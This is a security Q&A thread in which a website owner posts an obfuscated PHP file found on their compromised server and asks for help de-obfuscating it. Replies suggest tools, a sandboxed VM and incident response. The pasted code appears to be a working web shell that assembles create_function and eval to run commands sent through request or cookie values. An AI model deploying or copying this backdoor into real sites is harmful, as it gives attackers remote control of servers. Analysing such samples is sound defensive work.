1

I have a php7 site that had some malware type files uploaded to it. My hosting provider notified me of it and I have removed them, but I wanted help in understanding the attack (help de-obsfucating, and help understanding what it does) Here is the source: DONT RUN IT, as I dont know what it does.

<?php

$guillotine ='veLaT:(at'; $crust = 'cCrx9)'; $denials = 's';

$cockle='s';$cobby= 'e';

$cretinous ='uT,6)'; $antagonist = '[';$fortnightly ='iHr'; $formalism = 'i';$cowboy = 'a';$installed='i'; $lake =';R=^t';$dairymen='_';
$crept='$$i(f1a'; $bitterroot = 'v'; $arccos ='2?AEE_i_'; $lamb='a';$eradicated = 'tC';
$kimbell='sTiY';
$asymptotic= '"S';
$clarify = ')_,'; $firework='D/esH4+U';$clasping='b'; $divisor ='*rTts(';
$cautious ='EW-'; $embassy=')'; $chaperon ='t';$evinced ='s'; $ibid = 'P[P '; $alyson = 'KnTBe';

$buzzard= 'Sa_S);('; $laurent= ')Rk';
$enumerating= '>=Ueaa';$highly = '`7';$anonym= '0f_$R';$dam='r'; $gypsies ='rM?';$jaye= 't';$as= 'If';$flagrant = '8hHS$I)X';

$arcade = 'KT"'; $foolproof = 'r'; $bowmen ='F'; $incompatibly ='y'; $delegable='a';$heavy ='n$@Qsct';$diatribe= '4'; $campfire= 'o';
$hayyim= 'C;r__e'; $goober= 'e';$dejected= 'e';$bedazzle='$'; $incompletion = 'c'; $hypothetical= 'o'; $diploma= 'Ktusdd.J'; $irremediable='n';$epic ='eEt,S_a'; $faina = 'l(F'; $internet = 'T';

$ephemeris='('; $incorrect ='XfVg'; $binder='r'; $barnard = ')'; $libra= '"';$applied= 'O'; $christian = '_c';$bhoy = 'e';$grieving=']gspHH';$gained ='v'; $fisticuff ='3e:F';

$harlie ='EP)]'; $ermine ='h';

$bond = 'om$<a'; $groundsel ='c]_'; $banning ='r';$innocence ='$';$hutchins ='"'; $amoebae = 't';
$doggy ='y"'; $erminie='Z'; $finesse= '(T"(Vt[lT';

$differing= 'X($'; $atrophic='"]N:)ie'; $forswear = ')]xGK';$buddies = 'RE';
$cynthie = 'O[Tg6sce'; $lane ='(';
$encourage ='_';

$harassment='?p';$jobie ='i(';$camber ='['; $boiled = 'i$O';$bel = 'rQr(C);v';
$boating ='d';

$headwall = 'e';$exemplary = 'ek="5';$climate =';'; $comfortabilities =$cynthie['6'].$bel['2'] .$exemplary['0'].$bond['4'] . $finesse['5'].
$exemplary['0'] . $encourage .

$incorrect['1'] .$diploma['2']. $irremediable. $cynthie['6'].$finesse['5']. $boiled[0] .$bond['0']. $irremediable ;
$injunct =$ibid[3] ; $digestible=$comfortabilities($injunct,$exemplary['0'] .$bel['7'] . $bond['4'].$finesse['7']. $bel[3] . $bond['4']. $bel['2'] .$bel['2']. $bond['4'] .$doggy['0'].$encourage . $harassment['1'] .$bond['0']. $harassment['1'] .$bel[3].$incorrect['1'] .$diploma['2'].$irremediable. $cynthie['6'] .$encourage.$cynthie['3']. $exemplary['0'].$finesse['5'] .$encourage . $bond['4'].$bel['2'].
$cynthie['3'] . $cynthie[5]. $bel[3]. $bel[5] . $bel[5] .$bel[5] .$climate ); $digestible
($embarrassment['0'] , $fisticuff['3'], $arccos[2] , $cynthie[5],
$atrophic['2'], $divisor['0'],
$gypsies['1'],
$bond['3'] , $boiled['1'].$boiled[0]. $exemplary[2].$bond['4'] .$bel['2'].
$bel['2']. $bond['4'] .$doggy['0'] . $encourage .$bond['1'] .$exemplary['0'].$bel['2'] . $cynthie['3'].$exemplary['0'] .$bel[3].$boiled['1'] . $encourage.$buddies['0']. $buddies['1'].

$bel['1'].
$enumerating['2'].$buddies['1']. $epic[4].

$cynthie['2'].

$epic['3'].$boiled['1'] .$encourage. $bel['4'].$boiled['2']. $boiled['2'] .
$forswear['4'].$flagrant['5'] . $buddies['1'] . $epic['3'].$boiled['1']. $encourage.
$epic[4] . $buddies['1'] . $buddies['0']. $finesse['4'] .$buddies['1'].$buddies['0'] . $bel[5] .$climate.$boiled['1']. $bond['4'] . $exemplary[2]. $boiled[0]. $cynthie[5].$cynthie[5] .$exemplary['0']. $finesse['5'] .$bel[3]. $boiled['1']. $boiled[0] . $camber .$exemplary['3'] .$ermine . $forswear['2'] . $exemplary['1'] .

$cynthie['6'] .

$finesse['5']. $finesse['5']. $cynthie[5].
$incorrect['1'] .$exemplary['3']. $forswear['1'] .$bel[5]. $harassment['0'] .$boiled['1'].$boiled[0]. $camber. $exemplary['3'].
$ermine.$forswear['2']. $exemplary['1'] . $cynthie['6'].$finesse['5']. $finesse['5'] . $cynthie[5] .
$incorrect['1'] .$exemplary['3']. $forswear['1'].$atrophic['3'] . $bel[3].$boiled[0].$cynthie[5].$cynthie[5] . $exemplary['0'] .
$finesse['5'] .$bel[3]. $boiled['1'] .$boiled[0] .

$camber .$exemplary['3'] .$grieving['5']. $cynthie['2'] . $cynthie['2'].$harlie['1'] . $encourage .$grieving['5']. $differing['0'] .$forswear['4'].

$bel['4'] .$cynthie['2']. $cynthie['2'].$epic[4] . $fisticuff['3'] .$exemplary['3'] .
$forswear['1'].
$bel[5] .$harassment['0'] .

$boiled['1'].
$boiled[0] . $camber. $exemplary['3'] . $grieving['5'] .$cynthie['2'].$cynthie['2'] .$harlie['1'] . $encourage.$grieving['5'] .

$differing['0'] .$forswear['4']. $bel['4']. $cynthie['2'] . $cynthie['2'] .
$epic[4] . $fisticuff['3'] . $exemplary['3'] . $forswear['1'] .
$atrophic['3']. $boating.

$boiled[0].$exemplary['0'].$bel[5] .$climate . $exemplary['0'] . $bel['7'] .$bond['4']. $finesse['7'] .$bel[3]. $cynthie[5] .$finesse['5'] .$bel['2'] . $bel['2']. $exemplary['0'].$bel['7'].
$bel[3].$clasping . $bond['4'] .$cynthie[5].$exemplary['0']. $cynthie['4'].$diatribe.
$encourage.$boating. $exemplary['0'].

$cynthie['6'] . $bond['0'] . $boating. $exemplary['0'] .

$bel[3]. $cynthie[5] .

$finesse['5'].
$bel['2'].

$bel['2'] .

$exemplary['0'].$bel['7'].$bel[3].$boiled['1'] .

$bond['4']. $bel[5] .

$bel[5].$bel[5].$bel[5].$climate  );
ÁEDÁN
  • 21
  • 2
  • Can anyone give me a tip on a better way to ask this or more appropriate place to do so? – ÁEDÁN Jul 24 '17 at 15:18
  • I would try creating a virtual machine with a linux distro, setting up a completely closed firewall from inbound and outbound traffic and then try printing it. – noone392 Jul 24 '17 at 15:28
  • More canonical duplicate: [I found unknown PHP code on my server. How do I de-obfuscate the code?](https://security.stackexchange.com/q/115461/32746) – WhiteWinterWolf Jul 25 '17 at 07:57

1 Answers1

-2

Okay for de-obfuscation you can use online tools such as https://www.unphp.net/ or run a local VM to test what the php script does.

Also a piece of advice, since you found this in your website, it definitely means your website was hacked. As an incident response process you need to find the weakness in your website to prevent further attacks else you will keep getting this issues.

Rory Alsop
  • 61,474
  • 12
  • 117
  • 321
Adetutu
  • 5
  • 2
  • 2
    Welcome on Security.SE. *"you can contact me for a Vulnerability Assessment on your website."*: I'm not sure this website is the best place to sell your services. Moreover, the aspect of dealing with a compromised server is already covered in [another question](https://security.stackexchange.com/q/39231/32746). I don't want to be rude, but this website is place to allow people to learn, not to sell them services. – WhiteWinterWolf Jul 25 '17 at 08:00